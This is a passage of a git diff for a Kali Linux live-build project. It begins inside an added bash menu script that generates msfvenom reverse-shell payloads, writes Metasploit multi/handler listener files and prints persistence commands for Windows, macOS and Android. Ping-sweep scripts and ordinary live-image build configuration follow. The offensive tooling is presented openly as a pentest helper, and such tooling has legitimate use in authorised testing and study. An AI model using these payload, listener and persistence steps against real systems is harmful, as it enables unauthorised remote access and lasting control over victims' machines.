"\E[1;33m::::: \e[97mshell.elf saved to ~/Desktop/temp\E[1;33m:::::" + ;; + "Mac") + read -p 'Set LHOST IP: ' uservar; read -p 'Set LPORT: ' userport + msfvenom -p osx/x86/shell_reverse_tcp LHOST=$uservar LPORT=$userport -f macho > ~/Desktop/temp/shell.macho + echo -e "\E[1;33m::::: \e[97mshell.macho saved to ~/Desktop/temp\E[1;33m:::::" + ;; + "Android") + read -p 'Set LHOST IP: ' uservar; read -p 'Set LPORT: ' userport + msfvenom -p android/meterpreter/reverse_tcp LHOST=$uservar LPORT=$userport R > ~/Desktop/temp/shell.apk + echo -e "\E[1;33m::::: \e[97mshell.apk saved to ~/Desktop/temp\E[1;33m:::::" + ;; + "List_All") + xterm -e msvenom -l & + ;; + "Quit") + echo "Good Bye" && break + ;; + *) echo invalid option;; + esac +done + ;; + + "2" | "2" ) +echo -e "\E[1;33m::::: \e[97mLets Craft a LISTNER\E[1;33m:::::" + +PS3='Enter your choice 6=QUIT: ' +options=("Windows" "Linux" "Mac" "Android" "List_All" "Quit") +select opt in "${options[@]}" +do + case $opt in + "Windows") + touch ~/Desktop/temp/meterpreter.rc + echo use exploit/multi/handler > ~/Desktop/temp/meterpreter.rc + echo set PAYLOAD windows/meterpreter/reverse_tcp >> ~/Desktop/temp/meterpreter.rc + read -p 'Set LHOST IP: ' uservar + echo set LHOST $uservar >> ~/Desktop/temp/meterpreter.rc + read -p 'Set LPORT: ' uservar + echo set LPORT $uservar >> ~/Desktop/temp/meterpreter.rc + echo set ExitOnSession false >> ~/Desktop/temp/meterpreter.rc + echo exploit -j -z >> ~/Desktop/temp/meterpreter.rc + cat ~/Desktop/temp/meterpreter.rc + xterm -e msfconsole -r ~/Desktop/temp/meterpreter.rc & + ;; + "Linux") + touch ~/Desktop/temp/meterpreter_linux.rc + echo use exploit/multi/handler > ~/Desktop/temp/meterpreter_linux.rc + echo set PAYLOAD linux/x86/meterpreter/reverse_tcp >> ~/Desktop/temp/meterpreter_linux.rc + read -p 'Set LHOST IP: ' uservar + echo set LHOST $uservar >> ~/Desktop/temp/meterpreter_linux.rc + read -p 'Set LPORT: ' uservar + echo set LPORT $uservar >> ~/Desktop/temp/meterpreter_linux.rc + echo set ExitOnSession false >> ~/Desktop/temp/meterpreter_linux.rc + echo exploit -j -z >> ~/Desktop/temp/meterpreter_linux.rc + cat ~/Desktop/temp/meterpreter_linux.rc + xterm -e msfconsole -r ~/Desktop/temp/meterpreter_linux.rc & + exit + ;; + "Mac") + touch ~/Desktop/temp/meterpreter_mac.rc + echo use exploit/multi/handler > ~/Desktop/temp/meterpreter_mac.rc + echo set PAYLOAD osx/x86/shell_reverse_tcp >> ~/Desktop/temp/meterpreter_mac.rc + read -p 'Set LHOST IP: ' uservar + echo set LHOST $uservar >> ~/Desktop/temp/meterpreter_mac.rc + read -p 'Set LPORT: ' uservar + echo set LPORT $uservar >> ~/Desktop/temp/meterpreter_mac.rc + echo set ExitOnSession false >> ~/Desktop/temp/meterpreter_mac.rc + echo exploit -j -z >> ~/Desktop/temp/meterpreter_mac.rc + cat ~/Desktop/temp/meterpreter_mac.rc + xterm -e msfconsole -r ~/Desktop/temp/meterpreter_mac.rc & + ;; + "Android") + touch ~/Desktop/temp/meterpreter_droid.rc + echo use exploit/multi/handler > ~/Desktop/temp/meterpreter_droid.rc + echo set PAYLOAD osx/x86/shell_reverse_tcp >> ~/Desktop/temp/meterpreter_droid.rc + read -p 'Set LHOST IP: ' uservar + echo set LHOST $uservar >> ~/Desktop/temp/meterpreter_droid.rc + read -p 'Set LPORT: ' uservar + echo set LPORT $uservar >> ~/Desktop/temp/meterpreter_droid.rc + echo set ExitOnSession false >> ~/Desktop/temp/meterpreter_droid.rc + echo exploit -j -z >> ~/Desktop/temp/meterpreter_droid.rc + cat ~/Desktop/temp/meterpreter_droid.rc + xterm -e msfconsole -r ~/Desktop/temp/meterpreter_droid.rc & + ;; + "List_All") + touch ~/Desktop/temp/payloads.rc + echo show payloads > ~/Desktop/temp/payloads.rc + cat ~/Desktop/temp/payloads.rc + xterm -e msfconsole -r ~/Desktop/temp/payloads.rc & + ;; + "Quit") + echo "Good Bye" && break + ;; + *) echo invalid option;; + esac +done +;; + + "3" | "3" ) + # Accept upper or lowercase input. + echo -e "\E[1;33m::::: \e[97mStarting Metasploit \E[1;33m:::::" + msfconsole + use exploit/multi/handler + +;; + + + "4" | "4" ) + # + echo -e "\E[1;33m::::: \e[97mPersistence Generator \E[1;33m:::::" + PS3='Enter your choice 5=QUIT: ' + options=("Windows" "Linux" "Mac" "Android" "Quit") + select opt in "${options[@]}" + do + case $opt in + "Windows") + read -p 'Set LHOST IP: ' uservar; read -p 'Set LPORT: ' userport + echo -e "\E[1;33m::::: \e[97mrun persistence -U -X 30 -p $userport -r $uservar\E[1;33m:::::" + ;; + "Linux") + echo -e "\E[1;33m::::: \e[97mGet creative here :)\E[1;33m:::::" + ;; + "Mac") + echo 'Using directory /Applications/Utilities/' + read -p 'Enter payload file name :example *shell.macho: ' uservar; + echo -e "\E[1;33m::::: \e[97mdefaults write /Library/Preferences/loginwindow AutoLaunchedApplicationDictionary -array-add ‘{Path=”/Applications/Utilities/$uservar”;}’\E[1;33m:::::" + ;; + "Android") + touch ~/Desktop/temp/android.sh + echo \#\!/bin/bash >> ~/Desktop/temp/android.sh + echo while : >> ~/Desktop/temp/android.sh + echo do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity >> ~/Desktop/temp/android.sh + echo sleep 20 >> ~/Desktop/temp/android.sh + echo done >> ~/Desktop/temp/android.sh + cat ~/Desktop/temp/android.sh + echo -e "\E[1;33m::::: \e[97mandroid.sh saved to ~/Desktop/temp. Upload to / on device\E[1;33m:::::" + ;; + "Quit") + echo "Good Bye" && break + ;; + *) echo invalid option;; + esac +done +;; + + "5" | "5" ) + # + echo -e "\E[1;33m::::: \e[97mArmitage Launcher \E[1;33m:::::" + echo "armitage should be in /opt/armitage" + echo -e "\E[1;33m::::: \e[97mLaunching...\E[1;33m:::::" + xterm -e sudo java -jar /opt/armitage/armitage.jar & + +;; + + "x" | "x" ) +clear +echo We have a Zero Bug attacking all the login and +echo overlay files. +echo PLAGUE +echo Run anti-virus. Give me a systems display! +echo +echo The systems display comes up. Red flashes everywhere, +echo signifying new attacks. Plague presses a key. +echo +echo PLAGUE +echo Die, dickweeds! +echo +echo HAL +echo The rabbit is in the administration system. +echo +echo Rabbit icons start to fill the systems display. +echo +echo PLAGUE +echo Send a Flu-shot. +echo +echo MARGO +echo Rabbit, Flu-shot, someone talk to me. +echo +echo HAL +echo A rabbit replicates till it overloads a file, +echo then it spreads like cancer. +echo -e "\e[31m[Owning Gibson / Please wait...\e[31m]" +echo -ne '##### (33%)\r' +sleep 3 +echo -ne '############# (66%)\r' +sleep 3 +echo -ne '####################### (100%)\r' +echo -ne '\n' +echo Stager sent! Starting session.. .... +echo root@Gibson~# + + +;; + + * ) + # Default option. + # + echo + echo "Not yet in database." + ;; + +esac + +tput sgr0 # Reset colors to "normal." + +echo + +exit 0 diff --git a/filesystem/root/scripts/lazy.sh b/filesystem/root/scripts/lazy.sh new file mode 100755 index 00000000..d39e97e5 --- /dev/null +++ b/filesystem/root/scripts/lazy.sh @@ -0,0 +1,3 @@ +cd .. +git clone https://github.com/arismelachroinos/lscript + diff --git a/filesystem/root/scripts/pingsweep.sh b/filesystem/root/scripts/pingsweep.sh new file mode 100755 index 00000000..7cd71aec --- /dev/null +++ b/filesystem/root/scripts/pingsweep.sh @@ -0,0 +1,4 @@ +#!/bin/bash +for ip in $(seq 1 254); do +ping -c 1 172.100.100.$ip |grep "bytes from" |cut -d" " -f4|cut -d";" -f1& +done diff --git a/filesystem/root/scripts/pingsweepb.sh b/filesystem/root/scripts/pingsweepb.sh new file mode 100755 index 00000000..ebe837fa --- /dev/null +++ b/filesystem/root/scripts/pingsweepb.sh @@ -0,0 +1,15 @@ +#!/bin/bash +#----Zero the counter +counter=0 +#----Start the loop for the 4th octect. Must start at 1 since 0 would be broadcast +for ip4 in $(seq 1 254); do +#----Start the loop for the 3rd octect. This sould start form 0 + for ip3 in $(seq 0 254); do +#----Ping 1 time, look for bytes from to indicate sucessful ping +#----Echo the 4th field form the response which is the ip address +ping -c 1 10.1.$ip3.$ip4 |grep "bytes from" |cut -d" " -f4|cut -d";" -f1& +#echo 10.1.$ip3.$ip4 +counter=$((counter+1)) + done +done +echo $counter diff --git a/filesystem/root/scripts/wp6.sh b/filesystem/root/scripts/wp6.sh new file mode 100755 index 00000000..9c7dd312 --- /dev/null +++ b/filesystem/root/scripts/wp6.sh @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/modules/live-build-config/.getopt.sh b/modules/live-build-config/.getopt.sh new file mode 100644 index 00000000..8e7cbc9c --- /dev/null +++ b/modules/live-build-config/.getopt.sh @@ -0,0 +1,11 @@ +# Supported options are: +# -d | --distribution +# -p | --proposed-updates +# -a | --arch +# --subdir +# --version +# --variant +# -v | --verbose +# -s | --salt +BUILD_OPTS_SHORT="d:pa:vs" +BUILD_OPTS_LONG="distribution:,proposed-updates,arch:,subdir:,version:,variant:,verbose,salt" diff --git a/modules/live-build-config/README b/modules/live-build-config/README new file mode 100644 index 00000000..43d23d4b --- /dev/null +++ b/modules/live-build-config/README @@ -0,0 +1,8 @@ + +Some Debian bugs filed for issues encountered in Kali: + +#684865: live-build: lb_binary_syslinux fails to include flavour in menu entry +#684891: live-build: add a config parameter to define the project name +#684893: live-build: fails to find bootloaders files when running from git checkout +#684896: live-build: loading of build.sh does not work as expected in various scripts + diff --git a/modules/live-build-config/auto/clean b/modules/live-build-config/auto/clean new file mode 100755 index 00000000..8221855f --- /dev/null +++ b/modules/live-build-config/auto/clean @@ -0,0 +1,7 @@ +#!/bin/sh + +lb clean noauto "$@" +rm -f config/binary config/bootstrap \ + config/chroot config/common config/source \ + config/package-lists/live.list.chroot +find config/hooks/ -type l | xargs --no-run-if-empty rm -f diff --git a/modules/live-build-config/auto/config b/modules/live-build-config/auto/config new file mode 100755 index 00000000..991eadac --- /dev/null +++ b/modules/live-build-config/auto/config @@ -0,0 +1,144 @@ +#!/bin/bash + +set -e +set -o pipefail # Bashism + +# You can put a local mirror here if you want (or you can set +# it in .mirror) +if [ -e .mirror ]; then + kali_mirror=$(cat .mirror) +else + kali_mirror=http://archive.kali.org/kali +fi + +### DO NOT EDIT THE REST OF THIS FILE ### + +public_kali_mirror=http://http.kali.org/kali + +# Detect target architecture and filter args +temp="" +arch=$(dpkg --print-architecture) +dist="kali-rolling" +lb_opts="" +while [ $# -gt 0 ]; do + arg="$1" + case "$arg" in + -a|--arch|--architecture|--architectures) + arch="$2" + temp="$temp "'"'"$arg"'"' + temp="$temp "'"'"$2"'"' + shift + ;; + --distribution) + dist="$2" + shift + ;; + --variant) + variant="$2" + shift + ;; + -p|--proposed-updates) + enable_pu="1" + ;; + --) + # Skip the separator, it was added so that "lb config" + # doesn't barf on our own options, but now we are + # filtering them away assuming that the remaining ones + # are intended for lb config ! + ;; + *) + temp="$temp "'"'"$arg"'"' + ;; + esac + shift +done +eval set -- "$temp" + +# Resolve release name +dist=$(curl -s $kali_mirror/dists/$dist/Release | awk '/^Codename:/ {print $2}') + +# live-build doesn't work if --parent-debian-distribution is unknown of +# debian-cd => we have to put a symlink so that it deals with kali like sid +if [ ! -e ${LIVE_BUILD:-/usr/share/live/build}/data/debian-cd/$dist ]; then + if [ -w ${LIVE_BUILD:-/usr/share/live/build}/data/debian-cd ]; then + ln -sf sid ${LIVE_BUILD:-/usr/share/live/build}/data/debian-cd/$dist + else + echo "ERROR: Run this first:" + echo "ln -sf sid ${LIVE_BUILD:-/usr/share/live/build}/data/debian-cd/$dist" + exit 1 + fi +fi + +# Define options that vary across architectures +case "$arch" in + amd64) + lb_opts="$lb_opts --debian-installer live" + ;; + i386) + lb_opts="$lb_opts --debian-installer live --linux-flavours 686-pae" + ;; + armel|armhf) + lb_opts="$lb_opts --binary-images hdd --binary-filesystem ext4 --chroot-filesystem none" + ;; + *) + echo "WARNING: configuration not tested on arch $arch" >&2 + ;; +esac + +# Define options that vary across distributions +case "$dist" in + kali-last-snapshot) + # We don't want kali-last-snapshot to end up in the image, it + # should be replaced with kali-rolling + lb_opts="$lb_opts --distribution-binary kali-rolling" + lb_opts="$lb_opts --debootstrap-script /usr/share/debootstrap/scripts/kali-rolling" + ;; +esac + +# Setup configuration files from variant and options + +# Drop all files that a former run might have put into place +for file in $(cd kali-config && find . -type f); do + file=${file#./*/} + rm -f config/$file +done +rm -f config/archives/kali-proposed-updates.list.* + +# Copy over all files from official kali configuration +cp -rT kali-config/common config +[ ! -d kali-config/release-$dist ] || cp -rTL kali-config/release-$dist config +[ ! -d kali-config/variant-$variant ] || cp -rTL kali-config/variant-$variant config + +if [ -n "$enable_pu" ]; then + mkdir -p config/archives + echo "deb $kali_mirror $dist-proposed-updates main contrib non-free" \ + > config/archives/kali-proposed-updates.list.chroot + echo "deb $public_kali_mirror $dist-proposed-updates main contrib non-free" \ + > config/archives/kali-proposed-updates.list.binary +fi + +lb config noauto \ + --distribution "$dist" \ + --debian-installer-distribution "$dist" \ + --archive-areas "main contrib non-free" \ + --debootstrap-options "--keyring=/usr/share/keyrings/kali-archive-keyring.gpg" \ + --keyring-packages kali-archive-keyring \ + --updates false \ + --backports false \ + --source false \ + --firmware-binary true \ + --firmware-chroot true \ + --mirror-bootstrap "$kali_mirror" \ + --mirror-debian-installer "$kali_mirror" \ + --mirror-binary "$public_kali_mirror" \ + --iso-application "Kali Linux" \ + --iso-publisher "Kali" \ + --iso-volume "Kali Live" \ + --linux-packages linux-image \ + --memtest memtest86 \ + --bootappend-live "boot=live components splash username=root hostname=kali" \ + --bootappend-live-failsafe "boot=live components username=root hostname=kali memtest noapic noapm nodma nomce nolapic nomodeset nosmp nosplash vga=normal" \ + --bootappend-install "net.ifnames=0" \ + --security false \ + $lb_opts \ + "$@" diff --git a/modules/live-build-config/build.sh b/modules/live-build-config/build.sh new file mode 100755 index 00000000..16f29826 --- /dev/null +++ b/modules/live-build-config/build.sh @@ -0,0 +1,186 @@ +#!/bin/bash + +set -e +set -o pipefail # Bashism + +KALI_DIST="kali-rolling" +KALI_VERSION="" +KALI_VARIANT="default" +TARGET_DIR="$(dirname $0)/images" +TARGET_SUBDIR="" +SUDO="sudo" +VERBOSE="" +HOST_ARCH=$(dpkg --print-architecture) + +image_name() { + local arch=$1 + + case "$arch" in + i386|amd64) + IMAGE_TEMPLATE="live-image-ARCH.hybrid.iso" + ;; + armel|armhf) + IMAGE_TEMPLATE="live-image-ARCH.img" + ;; + esac + echo $IMAGE_TEMPLATE | sed -e "s/ARCH/$arch/" +} + +target_image_name() { + local arch=$1 + + IMAGE_NAME="$(image_name $arch)" + IMAGE_EXT="${IMAGE_NAME##*.}" + if [ "$IMAGE_EXT" = "$IMAGE_NAME" ]; then + IMAGE_EXT="img" + fi + if [ "$KALI_VARIANT" = "default" ]; then + echo "${TARGET_SUBDIR:+$TARGET_SUBDIR/}kali-linux-$KALI_VERSION-$KALI_ARCH.$IMAGE_EXT" + else + echo "${TARGET_SUBDIR:+$TARGET_SUBDIR/}kali-linux-$KALI_VARIANT-$KALI_VERSION-$KALI_ARCH.$IMAGE_EXT" + fi +} + +target_build_log() { + TARGET_IMAGE_NAME=$(target_image_name $1) + echo ${TARGET_IMAGE_NAME%.*}.log +} + +default_version() { + case "$1" in + kali-*) + echo "${1#kali-}" + ;; + *) + echo "$1" + ;; + esac +} + +failure() { + # Cleanup update-kali-menu that might stay around so that the + # build chroot can be properly unmounted + $SUDO pkill -f update-kali-menu || true + echo "Build of $KALI_DIST/$KALI_VARIANT/$KALI_ARCH live image failed (see build.log for details)" >&2 + exit 2 +} + +run_and_log() { + if [ -n "$VERBOSE" ]; then + "$@" 2>&1 | tee -a build.log + else + "$@" >>build.log 2>&1 + fi + return $? +} + +. $(dirname $0)/.getopt.sh + +# Parsing command line options +temp=$(getopt -o "$BUILD_OPTS_SHORT" -l "$BUILD_OPTS_LONG,get-image-path" -- "$@") +eval set -- "$temp" +while true; do + case "$1" in + -d|--distribution) KALI_DIST="$2"; shift 2; ;; + -p|--proposed-updates) OPT_pu="1"; shift 1; ;; + -a|--arch) KALI_ARCHES="${KALI_ARCHES:+$KALI_ARCHES } $2"; shift 2; ;; + -v|--verbose) VERBOSE="1"; shift 1; ;; + -s|--salt) shift; ;; + --variant) KALI_VARIANT="$2"; shift 2; ;; + --version) KALI_VERSION="$2"; shift 2; ;; + --subdir) TARGET_SUBDIR="$2"; shift 2; ;; + --get-image-path) ACTION="get-image-path"; shift 1; ;; + --) shift; break; ;; + *) echo "ERROR: Invalid command-line option: $1" >&2; exit 1; ;; + esac +done + +# Set default values +KALI_ARCHES=${KALI_ARCHES:-$HOST_ARCH} +if [ -z "$KALI_VERSION" ]; then + KALI_VERSION="$(default_version $KALI_DIST)" +fi + +# Check parameters +for arch in $KALI_ARCHES; do + if [ "$arch" = "$HOST_ARCH" ]; then + continue + fi + case "$HOST_ARCH/$arch" in + amd64/i386|i386/amd64) + ;; + *) + echo "Can't build $arch image on $HOST_ARCH system." >&2 + exit 1 + ;; + esac +done +if [ ! -d "$(dirname $0)/kali-config/variant-$KALI_VARIANT" ]; then + echo "ERROR: Unknown variant of Kali configuration: $KALI_VARIANT" >&2 +fi + +# Build parameters for lb config +KALI_CONFIG_OPTS="--distribution $KALI_DIST -- --variant $KALI_VARIANT" +if [ -n "$OPT_pu" ]; then + KALI_CONFIG_OPTS="$KALI_CONFIG_OPTS --proposed-updates" + KALI_DIST="$KALI_DIST+pu" +fi + +# Set sane PATH (cron seems to lack /sbin/ dirs) +export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + +# Either we use a git checkout of live-build +# export LIVE_BUILD=/srv/cdimage.kali.org/live/live-build + +# Or we ensure we have proper version installed +ver_live_build=$(dpkg-query -f '${Version}' -W live-build) +if dpkg --compare-versions "$ver_live_build" lt 1:20151215kali1; then + echo "ERROR: You need live-build (>= 1:20151215kali1), you have $ver_live_build" >&2 + exit 1 +fi + +# Check we have a good debootstrap +ver_debootstrap=$(dpkg-query -f '${Version}' -W debootstrap) +if dpkg --compare-versions "$ver_debootstrap" lt "1.0.97"; then + if ! echo "$ver_debootstrap" | grep -q kali; then + echo "ERROR: You need debootstrap >= 1.0.97 (or a Kali patched debootstrap). Your current version: $ver_debootstrap" >&2 + exit 1 + fi +fi + +# We need root rights at some point +if [ "$(whoami)" != "root" ]; then + if ! which $SUDO >/dev/null; then + echo "ERROR: $0 is not run as root and $SUDO is not available" >&2 + exit 1 + fi +else + SUDO="" # We're already root +fi + +if [ "$ACTION" = "get-image-path" ]; then + for KALI_ARCH in $KALI_ARCHES; do + echo $(target_image_name $KALI_ARCH) + done + exit 0 +fi + +cd $(dirname $0) +mkdir -p $TARGET_DIR/$TARGET_SUBDIR + +for KALI_ARCH in $KALI_ARCHES; do + IMAGE_NAME="$(image_name $KALI_ARCH)" + set +e + : > build.log + run_and_log $SUDO lb clean --purge + [ $? -eq 0 ] || failure + run_and_log lb config -a $KALI_ARCH $KALI_CONFIG_OPTS "$@" + [ $? -eq 0 ] || failure + run_and_log $SUDO lb build + if [ $? -ne 0 ] || [ ! -e $IMAGE_NAME ]; then + failure + fi + set -e + mv -f $IMAGE_NAME $TARGET_DIR/$(target_image_name $KALI_ARCH) + mv -f build.log $TARGET_DIR/$(target_build_log $KALI_ARCH) +done diff --git a/modules/live-build-config/build_all.sh b/modules/live-build-config/build_all.sh new file mode 120000 index 00000000..c07a74de --- /dev/null +++ b/modules/live-build-config/build_all.sh @@ -0,0 +1 @@ +build.sh \ No newline at end of file diff --git a/modules/live-build-config/kali-config/common/bootloaders/grub-pc/dejavu-bold-14.pf2 b/modules/live-build-config/kali-config/common/bootloaders/grub-pc/dejavu-bold-14.pf2 new file mode 100644 index 00000000..9b093b20 Binary files /dev/null and b/modules/live-build-config/kali-config/common/bootloaders/grub-pc/dejavu-bold-14.pf2 differ diff --git a/modules/live-build-config/kali-config/common/bootloaders/grub-pc/dejavu-bold-16.pf2 b/modules/live-build-config/kali-config/common/bootloaders/grub-pc/dejavu-bold-16.pf2 new file mode 100644 index 00000000..11e7f7ab Binary files /dev/null and b/modules/live-build-config/kali-config/common/bootloaders/grub-pc/dejavu-bold-16.pf2 differ diff --git a/modules/live-build-config/kali-config/common/bootloaders/grub-pc/grub.cfg b/modules/live-build-config/kali-config/common/bootloaders/grub-pc/grub.cfg new file mode 100644 index 00000000..d9bfb741 --- /dev/null +++ b/modules/live-build-config/kali-config/common/bootloaders/grub-pc/grub.cfg @@ -0,0 +1,62 @@ +set default=0 + +loadfont $prefix/dejavu-bold-16.pf2 +loadfont $prefix/dejavu-bold-14.pf2 +loadfont $prefix/unicode.pf2 +set gfxmode=auto +insmod all_video +insmod gfxterm +insmod png + +set color_normal=light-gray/black +set color_highlight=white/black + +if [ -e /isolinux/splash.png ]; then + # binary_syslinux modifies the theme file to point to the correct + # background picture + set theme=/boot/grub/live-theme/theme.txt +elif [ -e /boot/grub/splash.png ]; then + set theme=/boot/grub/live-theme/theme.txt +else + set menu_color_normal=cyan/blue + set menu_color_highlight=white/blue +fi + +terminal_output gfxterm + +insmod play +play 960 440 1 0 4 440 1 + +# Live boot +LINUX_LIVE + +menuentry "Live system (forensic mode)" { + linux KERNEL_LIVE APPEND_LIVE noswap noautomount + initrd INITRD_LIVE +} +menuentry "Live system (persistence, check kali.org/prst)" { + linux KERNEL_LIVE APPEND_LIVE persistence + initrd INITRD_LIVE +} +menuentry "Live system (encrypted persistence, check kali.org/prst)" { + linux KERNEL_LIVE APPEND_LIVE persistent=cryptsetup persistence-encryption=luks persistence + initrd INITRD_LIVE +} + +# Installer (if any) +LINUX_INSTALL + +menuentry "Start installer with speech synthesis" { + linux KERNEL_GI speakup.synth=soft APPEND_GI + initrd INITRD_GI +} + +submenu 'Advanced options...' { + +# More installer entries (if any) +LINUX_ADVANCED_INSTALL + +# Memtest (if any) +MEMTEST + +} diff --git a/modules/live-build-config/kali-config/common/bootloaders/grub-pc/live-theme/theme.txt b/modules/live-build-config/kali-config/common/bootloaders/grub-pc/live-theme/theme.txt new file mode 100644 index 00000000..28fcc751 --- /dev/null +++ b/modules/live-build-config/kali-config/common/bootloaders/grub-pc/live-theme/theme.txt @@ -0,0 +1,63 @@ +desktop-image: "../splash.png" +title-color: "#ffffff" +title-font: "DejaVu Sans Bold 16" +title-text: "" +message-font: "Unifont Regular 16" +terminal-font: "Unifont Regular 16" + +#help bar at the bottom ++ label { + top = 100%-50 + left = 0 + width = 100% + height = 20 + text = "@KEYMAP_SHORT@" + align = "center" + color = "#ffffff" + font = "DejaVu Sans Bold 14" +} + +# Title in the middle box ++ label { + top = 38% + left = 0 + width = 100% + height = 35 + align = "center" + color = "#ffffff" + text = "Kali Linux Live Boot Menu" + font = "DejaVu Sans Bold 16" +} + +#boot menu ++ boot_menu { + left = 13% + width = 74% + top = 38%+35 + height = 170 + item_color = "#a8a8a8" + item_font = "DejaVu Sans Bold 14" + selected_item_color= "#ffffff" + selected_item_font = "DejaVu Sans Bold 14" + item_height = 16 + item_padding = 0 + item_spacing = 4 + icon_width = 0 + icon_heigh = 0 + item_icon_space = 0 +} + +#progress bar ++ progress_bar { + id = "__timeout__" + left = 13% + top = 100%-80 + height = 16 + width = 74% + font = "DejaVu Sans Bold 14" + text_color = "#000000" + fg_color = "#ffffff" + bg_color = "#a8a8a8" + border_color = "#ffffff" + text = "@TIMEOUT_NOTIFICATION_LONG@" +} diff --git a/modules/live-build-config/kali-config/common/bootloaders/grub-pc/splash.png b/modules/live-build-config/kali-config/common/bootloaders/grub-pc/splash.png new file mode 100644 index 00000000..0b92d506 Binary files /dev/null and b/modules/live-build-config/kali-config/common/bootloaders/grub-pc/splash.png differ diff --git a/modules/live-build-config/kali-config/common/hooks/live/accessibility-menu.binary b/modules/live-build-config/kali-config/common/hooks/live/accessibility-menu.binary new file mode 100755 index 00000000..75cebb7e --- /dev/null +++ b/modules/live-build-config/kali-config/common/hooks/live/accessibility-menu.binary @@ -0,0 +1,15 @@ +#!/bin/sh + +if [ ! -d isolinux ]; then + cd binary +fi + +cat >>isolinux/install.cfg <>isolinux/live.cfg < /etc/udev/rules.d/73-special-net-names.rules +update-initramfs -u + +# Run updatedb to initialize the database for the locate command +if [ -x "$(which updatedb 2>/dev/null)" ]; then + updatedb +fi diff --git a/modules/live-build-config/kali-config/common/hooks/live/persistence-menu.binary b/modules/live-build-config/kali-config/common/hooks/live/persistence-menu.binary new file mode 100755 index 00000000..30a398bd --- /dev/null +++ b/modules/live-build-config/kali-config/common/hooks/live/persistence-menu.binary @@ -0,0 +1,22 @@ +#!/bin/sh + +if [ ! -d isolinux ]; then + cd binary +fi + +cat >>isolinux/live.cfg </dev/null; do + echo "Sleeping 10 seconds as update-kali-menu is still running..." + sleep 10 + done +fi diff --git a/modules/live-build-config/kali-config/common/includes.binary/isolinux/splash.png b/modules/live-build-config/kali-config/common/includes.binary/isolinux/splash.png new file mode 100644 index 00000000..0b92d506 Binary files /dev/null and b/modules/live-build-config/kali-config/common/includes.binary/isolinux/splash.png differ diff --git a/modules/live-build-config/kali-config/common/includes.binary/isolinux/stdmenu.cfg b/modules/live-build-config/kali-config/common/includes.binary/isolinux/stdmenu.cfg new file mode 100644 index 00000000..f7a40122 --- /dev/null +++ b/modules/live-build-config/kali-config/common/includes.binary/isolinux/stdmenu.cfg @@ -0,0 +1,18 @@ +menu background splash.png +menu color title * #FFFFFFFF * +menu color border * #00000000 #00000000 none +menu color sel * #ffffffff #76a1d0ff * +menu color hotsel 1;7;37;40 #ffffffff #76a1d0ff * +menu color tabmsg * #ffffffff #00000000 * +menu color help 37;40 #ffdddd00 #00000000 none +menu vshift 10 +menu hshift 4 +menu width 70 +menu margin 5 +menu rows 10 +menu helpmsgrow 15 +# The command line must be at least one line from the bottom. +menu cmdlinerow 16 +menu timeoutrow 16 +menu tabmsgrow 18 +menu tabmsg Press ENTER to boot or TAB to edit a menu entry diff --git a/modules/live-build-config/kali-config/common/includes.chroot/root/.bashrc b/modules/live-build-config/kali-config/common/includes.chroot/root/.bashrc new file mode 100644 index 00000000..14eaf223 --- /dev/null +++ b/modules/live-build-config/kali-config/common/includes.chroot/root/.bashrc @@ -0,0 +1,110 @@ +# ~/.bashrc: executed by bash(1) for non-login shells. +# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc) +# for examples + +# If not running interactively, don't do anything +case $- in + *i*) ;; + *) return;; +esac + +# don't put duplicate lines or lines starting with space in the history. +# See bash(1) for more options +HISTCONTROL=ignoreboth + +# append to the history file, don't overwrite it +shopt -s histappend + +# for setting history length see HISTSIZE and HISTFILESIZE in bash(1) +HISTSIZE=1000 +HISTFILESIZE=2000 + +# check the window size after each command and, if necessary, +# update the values of LINES and COLUMNS. +shopt -s checkwinsize + +# If set, the pattern "**" used in a pathname expansion context will +# match all files and zero or more directories and subdirectories. +#shopt -s globstar + +# make less more friendly for non-text input files, see lesspipe(1) +#[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)" + +# set variable identifying the chroot you work in (used in the prompt below) +if [ -z "${debian_chroot:-}" ] && [ -r /etc/debian_chroot ]; then + debian_chroot=$(cat /etc/debian_chroot) +fi + +# set a fancy prompt (non-color, unless we know we "want" color) +case "$TERM" in + xterm-color) color_prompt=yes;; +esac + +# uncomment for a colored prompt, if the terminal has the capability; turned +# off by default to not distract the user: the focus in a terminal window +# should be on the output of commands, not on the prompt +force_color_prompt=yes + +if [ -n "$force_color_prompt" ]; then + if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then + # We have color support; assume it's compliant with Ecma-48 + # (ISO/IEC-6429). (Lack of such support is extremely rare, and such + # a case would tend to support setf rather than setaf.) + color_prompt=yes + else + color_prompt= + fi +fi + +if [ "$color_prompt" = yes ]; then + PS1='${debian_chroot:+($debian_chroot)}\[\033[01;31m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ ' +else + PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ ' +fi +unset color_prompt force_color_prompt + +# If this is an xterm set the title to user@host:dir +case "$TERM" in +xterm*|rxvt*) + PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1" + ;; +*) + ;; +esac + +# enable color support of ls and also add handy aliases +if [ -x /usr/bin/dircolors ]; then + test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)" + alias ls='ls --color=auto' + #alias dir='dir --color=auto' + #alias vdir='vdir --color=auto' + + #alias grep='grep --color=auto' + #alias fgrep='fgrep --color=auto' + #alias egrep='egrep --color=auto' +fi + +# some more ls aliases +#alias ll='ls -l' +#alias la='ls -A' +#alias l='ls -CF' + +# Alias definitions. +# You may want to put all your additions into a separate file like +# ~/.bash_aliases, instead of adding them here directly. +# See /usr/share/doc/bash-doc/examples in the bash-doc package. + +if [ -f ~/.bash_aliases ]; then + . ~/.bash_aliases +fi + +# enable programmable completion features (you don't need to enable +# this, if it's already enabled in /etc/bash.bashrc and /etc/profile +# sources /etc/bash.bashrc). +if ! shopt -oq posix; then + if [ -f /usr/share/bash-completion/bash_completion ]; then + . /usr/share/bash-completion/bash_completion + elif [ -f /etc/bash_completion ]; then + . /etc/bash_completion + fi +fi diff --git a/modules/live-build-config/kali-config/common/includes.chroot/usr/lib/live/config/0031-root-password b/modules/live-build-config/kali-config/common/includes.chroot/usr/lib/live/config/0031-root-password new file mode 100755 index 00000000..02bdc52c --- 